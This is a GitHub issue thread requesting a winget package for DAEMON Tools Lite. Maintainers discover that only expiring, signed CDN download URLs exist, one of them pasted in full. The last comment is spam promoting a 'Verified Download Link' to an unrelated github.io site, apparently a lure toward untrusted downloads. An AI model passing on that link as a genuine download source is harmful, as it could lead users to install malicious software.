### ISSUE TITLE
[Package Request]: DAEMON Tools Lite

### ISSUE THREAD

**Issue by Kaligula0** [microsoft/winget-pkgs#150848]
### How can we help?

I would like someone else to build the manifest.

### Please read and ensure the following

- [X] The installer meets the above requirements

### Please provide the following information

Download Page Url: https://www.daemon-tools.cc/eng/products/dtLite
Publisher: Disc Soft FZE LLC
Package Name: DAEMON Tools Lite
Description: Application for disc imaging (create disc images, emulate drives, mount disc images, VHDs and archives).
Package Version: 12.0.0.2126
Installer URL:

**Comment by vikingnope** [comment]
@Kaligula0, do you have any valid download links, because with this I am unable to create a manifest:

https://www.daemon-tools.cc/products/dtLite#install-dtLite-offer

**Comment by Kaligula0** [comment]
When I click *Download* the URL that I get is:
`https://file-service-default-114c67af0763a8a98e770ff3ee495371.fra1.digitaloceanspaces.com/f239582767665ef1c2a0121f172ac1efeeed8786/DTLite1200-2126.exe?X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=Z42SJEYMLCPREOBRVPTN%2F20240426%2Ffra1%2Fs3%2Faws4_request&X-Amz-Date=20240426T001903Z&X-Amz-SignedHeaders=host&X-Amz-Expires=3600&X-Amz-Signature=4ef8a1a3805ccb3886e134008fe838ede5572c6a2be2e509a48d89799bebffb0`
I doubt we can make use of it :l

**Comment by vikingnope** [comment]
That is an automatically generated by amazon when you click to download, so we cannot really use it

**Comment by Kaligula0** [comment]
I couldn't find any static URL even using browser console. I wrote to support. You can close this issue now. I'll ask here for reopening if I get any satisfactory reply from them.

**Comment by Kaligula0** [comment]
> No, since we are using a CDN network, we don't have a static URL for our installers.
> Best regards,
> DAEMON Tools Support Team
> Disc Soft

**Comment by meela1122** [comment]
👇👇⤋ 𝐁𝐄𝐋𝐎𝐖 𝐃𝐈𝐑𝐄𝐂𝐓 𝐃𝐎𝐖𝐍𝐋𝐎𝐀𝐃 𝐋𝐈𝐍𝐊⤋⬇️👇👇

**[Verified Download Link Here ✔✅](https://xzfiledownload.github.io/)**
